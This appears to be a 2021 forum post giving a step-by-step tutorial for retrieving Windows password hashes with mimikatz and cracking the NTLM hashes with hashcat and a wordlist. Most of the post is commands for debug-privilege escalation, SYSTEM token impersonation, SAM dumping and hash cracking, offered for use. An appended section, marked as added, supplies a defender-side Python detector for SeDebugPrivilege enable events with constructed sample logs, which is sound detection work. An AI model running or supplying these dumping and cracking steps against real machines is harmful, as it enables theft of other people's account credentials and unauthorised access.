OP 05 September, 2021 - 03:11 AM
HOW TO RETRIEVE AND CRACK WINDOWS PASSWORDS
⛏ Requirements
➤ Linux Machine (Host Machine)
➤ Windows Machine + Escalated Permissions
➤ CMD Access
➤ Password List
⚡️ ?????
First of all we need mimikatz. If you are using Kali Linux you can find mimikatz here:
/usr/share/windows-resources/mimikatz
xdg-open /usr/share/windows-resources/mimikatz
sudo zip `pwd`/mimikatz.zip -r -1 /usr/share/windows-resources/mimikatz
After creating the zip, upload it somewhere, download it on the Windows machine and move it to the desktop.
For cracking we also need the hashcat tool:
sudo apt install hashcat -y
1️⃣ Check Architecture
Open cmd and type:
wmic os get osarchitecture
If you have 32-bit, go into the win32 folder; if you have 64-bit, go into the x64 folder.
2️⃣ Run Mimikatz
Run the mimikatz.exe as Administrator.
To request the debug privilege we type:
privilege::debug
The success response should be:
Privilege '20' OK
3️⃣ Impersonate Token & Dump SAM
To impersonate a SYSTEM token we use the following command:
token::elevate
It will print a lot of text like this:
https://i.imgur.com/b4WS6tc.png
Let's dump the SAM:
lsadump::sam
The output looks like this:
https://i.imgur.com/ibYmfMA.png
4️⃣ Note And Crack The Hash
Scroll down a bit and you will see the entries listed by "RID", "User" and "Hash NTLM".
I scrolled down until I saw my username and then I copied the hash into a Linux text file.
Screenshot:
https://i.imgur.com/9elUpcW.png
echo "0cb6948...07973b89537" > password.hash
Now it's time for cracking the hash with hashcat.
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt
-m = mode
1000 = NTLM
For other modes you can either use the hashcat help command or take a look at their wiki:
hashcat --help
https://hashcat.net/wiki/
Finally, when hashcat finishes, you can view the cracked password either in its output:
https://i.imgur.com/KT9paTO.png
or by repeating the command with the --show parameter:
hashcat -m 1000 password.hash /usr/share/wordlists/rockyou.txt --show
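A defender-side example, added here and not part of the original post: the step-2 success line "Privilege '20' OK" means SeDebugPrivilege (LUID 20) was enabled on the mimikatz token, and Windows records such token adjustments as Security event 4703 when "Audit Authorization Policy Change" is enabled. The event field names follow 4703, but the sample events and the process allowlist below are constructed assumptions, not real log data or a real baseline:

```python
# Added example, not part of the original post: detection logic for the
# privilege::debug step. "Privilege '20' OK" means the privilege with LUID 20,
# SeDebugPrivilege, was enabled on the process token. Security event 4703
# ("A user right was adjusted") records each such adjustment with the calling
# process and privilege names. Events and allowlist here are constructed.

# Processes expected to enable SeDebugPrivilege in this (assumed) estate.
EXPECTED_DEBUG_PROCESSES = {
    r"C:\Windows\System32\svchost.exe",
    r"C:\Windows\System32\services.exe",
}

def privilege_names(privilege_list):
    """Split an EnabledPrivilegeList value (one per line; tabs/commas tolerated)."""
    return {p.strip() for p in privilege_list.replace(",", "\n").split("\n") if p.strip()}

def find_suspicious_debug_enables(events, allowlist=EXPECTED_DEBUG_PROCESSES):
    """Return (user, process) pairs for 4703 events that enabled SeDebugPrivilege
    from a process outside the allowlist (case-insensitive path match)."""
    allowed = {p.lower() for p in allowlist}
    hits = []
    for ev in events:
        if ev.get("EventID") != 4703:
            continue  # 4672 lists privileges at logon; it is not a token adjustment
        if "SeDebugPrivilege" not in privilege_names(ev.get("EnabledPrivilegeList", "")):
            continue
        proc = ev.get("ProcessName", "")
        if proc.lower() not in allowed:
            hits.append((ev.get("SubjectUserName", "?"), proc))
    return hits

# Constructed sample events (simplified; not captured from a real system).
SAMPLE_EVENTS = [
    {"EventID": 4703, "SubjectUserName": "SYSTEM",
     "ProcessName": r"C:\Windows\System32\svchost.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege"},
    {"EventID": 4703, "SubjectUserName": "alice",
     "ProcessName": r"C:\Users\alice\Desktop\x64\mimikatz.exe",
     "EnabledPrivilegeList": "SeDebugPrivilege"},
    {"EventID": 4703, "SubjectUserName": "alice",
     "ProcessName": r"C:\Windows\explorer.exe",
     "EnabledPrivilegeList": "SeShutdownPrivilege"},
    {"EventID": 4672, "SubjectUserName": "alice",
     "PrivilegeList": "SeDebugPrivilege\n\t\tSeBackupPrivilege"},
]

if __name__ == "__main__":
    for user, proc in find_suspicious_debug_enables(SAMPLE_EVENTS):
        print(f"ALERT: {user} enabled SeDebugPrivilege via {proc}")
```

Event 4703 is noisy on a busy host, so the allowlist is the tuning knob; build it from what your own baseline shows rather than from this assumed list.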